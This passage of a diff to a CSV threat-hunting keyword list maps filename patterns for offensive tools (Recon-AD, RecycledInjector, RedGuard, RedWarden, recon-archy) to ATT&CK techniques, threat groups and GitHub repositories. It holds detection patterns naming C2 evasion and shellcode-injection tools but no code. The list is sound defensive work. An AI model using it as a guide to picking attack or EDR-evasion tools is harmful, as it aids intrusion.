T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - 
T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*ReconUserGroupRoles.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. 
A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2611","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" +"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2612","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" "*Red-Baron*","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. 
secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","362","72","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" -"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda 
- Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - 